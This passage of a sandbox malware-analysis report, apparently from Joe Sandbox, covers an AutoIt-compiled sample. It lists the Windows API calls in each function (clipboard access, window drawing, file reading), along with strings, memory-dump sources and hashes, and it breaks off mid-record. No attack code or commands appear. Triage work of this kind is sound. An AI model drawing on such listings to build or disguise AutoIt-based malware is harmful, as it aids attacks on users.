                                                                        • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                        • IsWindowVisible.USER32(?), ref: 0045682C
                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                        • GetWindowRect.USER32(?,?), ref: 00456873
                                                                        • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                        • CopyRect.USER32(?,?), ref: 004568BE
                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                        • String ID: ($,$tooltips_class32
                                                                        • API String ID: 225202481-3320066284
                                                                        • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                        • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                        • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                        • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                        APIs
                                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                        • String ID:
                                                                        • API String ID: 15083398-0
                                                                        • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                        • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                        • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                        • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                        • GetClientRect.USER32(?,?), ref: 00471D05
                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                        • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                        • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                        • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                        • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                        • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                        • String ID: @$AutoIt v3 GUI
                                                                        • API String ID: 867697134-3359773793
                                                                        • Opcode ID: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                                        • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                        • Opcode Fuzzy Hash: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                                        • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                        • API String ID: 1503153545-1459072770
                                                                        • Opcode ID: b1dcb5dacd1f2072149b846e72ce4b3dcf4a50df91d710b51ce636c939b7599d
                                                                        • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                        • Opcode Fuzzy Hash: b1dcb5dacd1f2072149b846e72ce4b3dcf4a50df91d710b51ce636c939b7599d
                                                                        • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll$__wcsnicmp
                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                        • API String ID: 790654849-32604322
                                                                        • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                        • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                        • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                        • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e5b051fd50d99fa90b2629cec502b0b5abd27188c27a482d59dc70fd2e6235d1
                                                                        • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                        • Opcode Fuzzy Hash: e5b051fd50d99fa90b2629cec502b0b5abd27188c27a482d59dc70fd2e6235d1
                                                                        • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                        APIs
                                                                          • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                        • _fseek.LIBCMT ref: 00452B3B
                                                                        • __wsplitpath.LIBCMT ref: 00452B9B
                                                                        • _wcscpy.LIBCMT ref: 00452BB0
                                                                        • _wcscat.LIBCMT ref: 00452BC5
                                                                        • __wsplitpath.LIBCMT ref: 00452BEF
                                                                        • _wcscat.LIBCMT ref: 00452C07
                                                                        • _wcscat.LIBCMT ref: 00452C1C
                                                                        • __fread_nolock.LIBCMT ref: 00452C53
                                                                        • __fread_nolock.LIBCMT ref: 00452C64
                                                                        • __fread_nolock.LIBCMT ref: 00452C83
                                                                        • __fread_nolock.LIBCMT ref: 00452C94
                                                                        • __fread_nolock.LIBCMT ref: 00452CB5
                                                                        • __fread_nolock.LIBCMT ref: 00452CC6
                                                                        • __fread_nolock.LIBCMT ref: 00452CD7
                                                                        • __fread_nolock.LIBCMT ref: 00452CE8
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                        • __fread_nolock.LIBCMT ref: 00452D78
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                        • String ID:
                                                                        • API String ID: 2054058615-0
                                                                        • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                        • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                        • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                        • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window
                                                                        • String ID: 0
                                                                        • API String ID: 2353593579-4108050209
                                                                        • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                        • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                        • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                        • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                        APIs
                                                                        • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                        • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                        • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                        • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                        • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                        • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                        • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                        • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                        • GetSysColor.USER32(00000008), ref: 0044A265
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                        • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                        • String ID:
                                                                        • API String ID: 1744303182-0
                                                                        • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                        • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                        • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                        • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                        • __mtterm.LIBCMT ref: 00417C34
                                                                          • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                          • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                        • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                        • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                        • __init_pointers.LIBCMT ref: 00417CE6
                                                                        • __calloc_crt.LIBCMT ref: 00417D54
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                        • API String ID: 4163708885-3819984048
                                                                        • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                        • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                        • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                        • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                        • API String ID: 0-1896584978
                                                                        • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                        • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                        • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                        • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll$IconLoad
                                                                        • String ID: blank$info$question$stop$warning
                                                                        • API String ID: 2485277191-404129466
                                                                        • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                        • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                        • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                        • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                        APIs
                                                                        • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                        • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                        • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                        • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                        • GetDesktopWindow.USER32 ref: 0045476F
                                                                        • GetWindowRect.USER32(00000000), ref: 00454776
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                        • GetClientRect.USER32(?,?), ref: 004547D2
                                                                        • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                        Memory Dump Source
